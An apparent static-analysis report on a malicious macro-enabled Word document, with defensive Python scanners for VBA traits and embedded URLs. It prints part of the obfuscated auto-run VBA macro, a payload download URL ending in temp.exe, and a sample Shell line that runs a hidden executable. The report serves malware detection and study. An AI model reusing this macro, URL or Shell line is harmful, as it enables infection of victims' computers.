Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ca4240356fa75fc8…

MALICIOUS

Office (OOXML)

Size: 227.5 KB
Created: 2018-12-19 15:51:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-02-04
MD5: 47be4c7201d898e99f4794d379aebc54
SHA-1: 47a537b2c7a1651d8d7cdc81204510f007b3ceb6
SHA-256: ca4240356fa75fc82fdf4bd53d762373ce425e074bb1c240ebab2b6a69b29004
Risk score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 User Execution: Malicious File

The sample is an OOXML (Word) document containing a VBA project. Its Document_Open procedure runs automatically when the document is opened, so the victim has to do nothing beyond opening the file (and enabling macros). The decoded source shown under Extracted artifacts is padded with junk: loops guarded by constant conditions that are never true (Do While 509 < 2, If 9 = 8 Then), unused Dim statements and Select Case blocks over string literals of high-byte characters, with Application.Run "tRvuhmO.rQshhoG" as the only live statement. The tRvuhmO module declares user32/kernel32 functions (GetPropA, SetPropA, RemovePropA, EnumPropsA, lstrlenA, lstrcpyA) behind random aliases. The Shell() call flagged by the heuristics executes a command, which is the usual way such macros download and run a second-stage payload; it lies past the point where the preview is truncated. The one non-namespace URL recovered from the file, https://melabatement.ga/workpay/fresh/new/temp.exe, came from the document body rather than from the macro, and the obfuscation prevents confirming from the visible source whether the macro fetches it or what else it does.
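As an added example (this is not the analysis tool's code; the pattern lists and the VBA_* finding IDs are this script's own assumptions, while the OLE_VBA_* IDs mirror the report's), a scanner that applies the same checks to a decoded VBA dump: auto-exec entry points, execution primitives, Win32 Declare imports, and the never-true constant conditions that pad this macro. The sample text is a constructed excerpt modelled on the preview under Extracted artifacts, with a Shell line added so that check fires; the page's preview is cut off before the real Shell() call.

```python
"""Triage decoded VBA source for the traits this report flags.

Added example, not the analysis tool's code. The pattern lists and the
VBA_* finding IDs are this script's own; OLE_VBA_* IDs mirror the report.
"""
import re

# Procedures Office runs without a click.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Auto_?Open|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b",
    re.I | re.M)
# Primitives that launch code or hand control to another module.
EXEC_RE = re.compile(
    r"\b(Shell|WScript\.Shell|ShellExecute|CreateObject|GetObject|Application\.Run|CallByName)\b",
    re.I)
# Win32 imports: capture the library and the real export hidden behind the Alias.
DECLARE_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+'
    r'(\w+)\s+Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?', re.I | re.M)
# Constant comparisons used as opaque predicates around junk code.
CONST_COND_RE = re.compile(
    r"^\s*(?:Do\s+While|If)\s+(-?\d+)\s*(<>|<=|>=|<|>|=)\s*(-?\d+)", re.I | re.M)
MODULE_RE = re.compile(r'^Attribute\s+VB_Name\s*=\s*"([^"]+)"', re.M)
_OPS = {"<": int.__lt__, ">": int.__gt__, "=": int.__eq__,
        "<>": int.__ne__, "<=": int.__le__, ">=": int.__ge__}

# Constructed excerpt modelled on the macro previewed in this report; the Shell
# line is added so that check fires (the preview is cut off before any Shell call).
SAMPLE_VBA = r'''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
Call girhrxloq
End Sub
Private Sub girhrxloq()
Do While 509 < 2
   Select Case fcjzxlpnnzf
   End Select
Exit Do
Loop
Do While 918 < 2
Exit Do
Loop
Do While 718 < 8
Exit Do
Loop
If 9 = 8 Then
Dim xoaihqjkb
Else
Application.Run "tRvuhmO.rQshhoG"
End If
End Sub
Attribute VB_Name = "tRvuhmO"
#If VBA7 Then
Private Declare PtrSafe Function nksnlyry Lib "user32" Alias "SetPropA" (ByVal hwnd As Long) As Long
#Else
Private Declare Function nksnlyry Lib "user32" Alias "SetPropA" (ByVal hwnd As Long) As Long
#End If
Private Sub rQshhoG()
Shell Environ("TEMP") & "\temp.exe", vbHide
End Sub
'''


def dead_conditions(src):
    """Constant conditions that can never be true, e.g. 'Do While 509 < 2'."""
    out = []
    for m in CONST_COND_RE.finditer(src):
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        if not _OPS[op](a, b):
            out.append(m.group(0).strip())
    return out


def scan_vba(src):
    """Summarise auto-exec hooks, execution primitives, Win32 imports and junk code."""
    declares = [(m.group(1), m.group(2).lower(), m.group(3) or m.group(1))
                for m in DECLARE_RE.finditer(src)]
    return {
        "modules": MODULE_RE.findall(src),
        "autoexec": [m.group(1) for m in AUTOEXEC_RE.finditer(src)],
        "exec_tokens": sorted({t.lower() for t in EXEC_RE.findall(src)}),
        "win32_imports": sorted({(lib, api) for _, lib, api in declares}),
        "dead_conditions": dead_conditions(src),
    }


def verdict(summary):
    """Map a summary onto finding IDs and a severity level."""
    hits, names = [], [n.lower() for n in summary["autoexec"]]
    if "document_open" in names:
        hits.append("OLE_VBA_DOCOPEN")          # report's ID
    elif names:
        hits.append("VBA_AUTOEXEC")             # this script's own ID
    if "shell" in summary["exec_tokens"]:
        hits.append("OLE_VBA_SHELL")            # report's ID
    if summary["win32_imports"]:
        hits.append("VBA_WIN32_DECLARE")        # this script's own ID
    if len(summary["dead_conditions"]) >= 3:
        hits.append("VBA_OPAQUE_PREDICATES")    # this script's own ID
    # Auto-exec plus any execution primitive is the combination that matters.
    level = "critical" if names and summary["exec_tokens"] else ("suspicious" if hits else "clean")
    return level, hits


if __name__ == "__main__":
    s = scan_vba(SAMPLE_VBA)
    for k, v in s.items():
        print(f"{k}: {v}")
    print("verdict:", verdict(s))
```

Feed it the output of olevba (or any decoded .bas dump) on stdin or as a string; the dead-condition count is a cheap signal that the macro was machine-generated with junk padding, which is worth surfacing on its own even when the execution primitive is hidden past the extracted region.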

Heuristics (5)

  • OOXML_VBA (medium; 3 related findings): VBA project inside OOXML. The document contains a VBA project, so macros are present.
  • OLE_VBA_SHELL (critical): Shell() call in VBA.
  • OLE_VBA_DOCOPEN (high): Document_Open macro, run automatically when the document is opened.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens. The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or ones where source extraction fails, so the macro is still detected when no visible source is available.
  • EMBEDDED_URL (info): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OOXML body / shared strings):
    • https://melabatement.ga/workpay/fresh/new/temp.exe (the only URL outside the standard namespace set; a direct link to an executable)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/photoshop/1.0/
    • http://purl.org/dc/elements/1.1/
    Apart from the first entry, these are XML namespace URIs (OOXML markup, Adobe XMP and Dublin Core metadata) that ordinary Word documents declare; they are not network indicators.
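An added example, not the report generator's code, showing how per-URL channel labels like the ones above can be produced offline: walk the OOXML zip, pull URLs out of each part, label each by where it was found (document text, relationship targets, the VBA project binary) and drop the namespace declarations. The in-memory .docx, the channel names and the example.invalid URLs are constructed for the demo; the temp.exe URL is the one this report recovered from the document body.

```python
"""Extract URLs from an OOXML container and label each by the part it came from.

Added example; not the report generator's code. The channel names, the
namespace allow-list and the in-memory sample .docx are this script's own.
"""
import io
import re
import zipfile

# Stop at whitespace, control bytes and XML/quote delimiters so binary parts
# (vbaProject.bin) yield clean strings too.
URL_RE = re.compile(r"https?://[^\x00-\x20\"'<>)\]]+", re.I)

# Namespace hosts every Word document declares; not network indicators.
NAMESPACE_HOSTS = ("schemas.openxmlformats.org", "schemas.microsoft.com",
                   "www.w3.org", "ns.adobe.com", "purl.org")


def channel_for(part):
    """Map a zip member name onto the channel an analyst cares about."""
    if part.endswith("vbaProject.bin"):
        return "macro"
    if part.endswith(".rels"):
        return "relationship (hyperlink/external target)"
    if part.startswith("word/") and part.endswith(".xml"):
        return "document text"
    return "other"


def is_namespace_uri(url):
    """True for URIs that are XML namespace declarations rather than indicators."""
    host = url.split("/", 3)[2].lower()
    return any(host == h or host.endswith("." + h) for h in NAMESPACE_HOSTS)


def extract_urls(docx_bytes):
    """Return [(url, channel, part)] for every URL in the container, namespaces included."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            text = z.read(name).decode("utf-8", errors="ignore")
            for url in URL_RE.findall(text):
                found.append((url.rstrip(".,;"), channel_for(name), name))
    return found


def indicators(docx_bytes):
    """URLs worth hunting on: deduplicated, namespace declarations removed."""
    seen = {}
    for url, channel, part in extract_urls(docx_bytes):
        if not is_namespace_uri(url):
            seen.setdefault(url, (channel, part))
    return seen


def build_sample_docx():
    """Constructed stand-in for the report's sample: a minimal .docx with a macro part."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml"><w:body><w:p><w:r>'
        '<w:t>Download https://melabatement.ga/workpay/fresh/new/temp.exe</w:t>'
        '</w:r></w:p></w:body></w:document>')
    rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="http://example.invalid/landing" TargetMode="External"/></Relationships>')
    # Hypothetical macro binary with an embedded plaintext URL between NUL bytes.
    vba_bin = b"\x00\x01junk\x00http://example.invalid/stage2.bin\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels)
        z.writestr("word/vbaProject.bin", vba_bin)
    return buf.getvalue()


if __name__ == "__main__":
    for url, (channel, part) in indicators(build_sample_docx()).items():
        print(f"{url}  [{channel}: {part}]")
```

Real vbaProject.bin streams store VBA source compressed, so a plain string scan of that part only catches URLs that happen to sit uncompressed (for example in p-code or string tables); pair it with olevba output for the decoded macro text.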

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 31547 bytes
SHA-256: a266cb510899852c4798b852a10abdeaed2ff81c8f9e3776612e8de74fbd12f5

Script preview (first 1,000 lines of the extracted source; the listing below is truncated before that point)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Document_Open()
Call girhrxloq
End Sub

Private Sub girhrxloq()



Dim lro
Dim wqmpla

Dim jbuzrwgv

Dim wzzsyzgomgi

Dim dutvspcqgjf As Date

Dim bidvisma
Dim fgeulnptgsoxpc
Dim sagv



dutvspcqgjf = 86
Do While 509 < 2
   Select Case fcjzxlpnnzf
            Case "?¹áê?¼ìÆÒ¨�î¬", "§Æíø?", "�¾ñô¡¼"
                 fhcasfdpcjlxb = "£Æòë?²ó½Ë¡?ð¦¦"
            Case "¦²ïö�ÂöÈݱ�", "¬Èëê�Ç"
                 suffix = "¤·ôñ?ÅáÀÛª?ç?¦Í"
            Case "¢´â饰", "¡ÄÜã?ÅçÎÞ"
                 fhcasfdpcjlxb = "¡¶æí�Èí»Ñ??Ú¡?"
            Case Else
                 zjawisl = "lhztjnhxpbme"
    End Select
Dim yqffqvs
Dim pbcc
Dim pbdmxdqbwcfgtfk
Exit Do
Randomize
Loop

Dim wwnxycnnayo As Date

Dim xebvguvpxe
Dim cvsenqngxrjnmf
Dim wtb



wwnxycnnayo = 28
Do While 918 < 2
   Select Case jlmqk
            Case "ªÉïî?ÃæÈÕ¤?ò?¤Ñ×", "?Åàõ£Ç", "?Äå÷?Áà"
                 grtbxvmwhoxfl = "¨·äê?½ö"
            Case "?Êãè?»ö", "ª¼ëâ?ÆçÉ"
                 suffix = "¬Êéê?²õ"
            Case "¦³ô", "¢½ëç?Æï"
                 grtbxvmwhoxfl = "?·ç÷?"
            Case Else
                 kjnweedinvpadd = "awknguocyvsynal"
    End Select
Dim uqpsfluzic
Dim gwrlibxtxbc
Dim ymy
Exit Do
Randomize
Loop

Dim vhh As Date

Dim klhrczp
Dim frmelszjelzqhqd
Dim kddfoplggfsvrb



vhh = 69
Do While 718 < 8
   Select Case bcecinfykf
            Case "¢·êò?¸", "?Çßä�¿è¾Ó§?ï©©", "¡½åè?"
                 eqadvzcbmfqoopv = "§²êô�"
            Case "?µî÷?²ïÇȦ?ã??Ñ", "¡¸êî?Äè»Ó"
                 suffix = "£ºçï�½âµØ£�ñ¨¡"
            Case "?ÊÛí", "§´åð¡µ"
                 eqadvzcbmfqoopv = "¢Áè"
            Case Else
                 tudc = "auohdjaovqwpejk"
    End Select
Dim nyyuzxjp
Dim owboearfkcnnc
Dim qkmvv
Exit Do
Randomize
Loop

Dim gjuwxmsxokbl As Date

Dim csaxllpyfeok
Dim uwwmtkixkka
Dim rohtckew



gjuwxmsxokbl = 24
Do While 566 < 8
   Select Case jbznqtsm
            Case "?Ääà?³÷", "«Æíà?¿åÆ", "¨´ì"
                 yaxyabh = "­ÂÛç?¿õÂÏ"
            Case "¤¶Û÷£¿à¶Ê??é??Ãà", "«½âî ¶çÉÚ"
                 suffix = "ª²åâ?ÀêÍ×±"
            Case "?³ëö?°ö¸È¯?á©", " ³àç?»åÁÍ"
                 yaxyabh = "¦ÁÞõ?³èÎÔ­?á?"
            Case Else
                 vrgcytcwmvkf = "rnahqpojejdcyr"
    End Select
Dim iynjjfparradzzfv
Dim zsaieuwevelzensm
Dim aputiuwavjqcn
Exit Do
Randomize
Loop





If 9 = 8 Then
Dim xoaihqjkb
Else
Dim vyferrkbby
Application.Run "tRvuhmO.rQshhoG"
End If





Dim wihv

Dim hokgfi

End Sub




Attribute VB_Name = "tRvuhmO"
Const iugjrrbrcyjdfii = 418
Const fre = 8
Const anewfptxuqh = 75

#If VBA7 Then

#Else

#End If

#If VBA7 Then
Private Declare PtrSafe Function ngnwepbyrzo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function nksnlyry Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long
Private Declare PtrSafe Function xldkxogdkfd Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare PtrSafe Function gqrs Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long
Private Declare PtrSafe Function hmxjeauixufx Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare PtrSafe Function pxkbfeklwdlkj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
#Else
Private Declare  Function ngnwepbyrzo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long
Private Declare  Function nksnlyry  Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As 
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 71680 bytes
SHA-256: ead3aad0bfe1869b497f16c79222e19f8dfb9f958f20c86be30274cb9dbe9c9d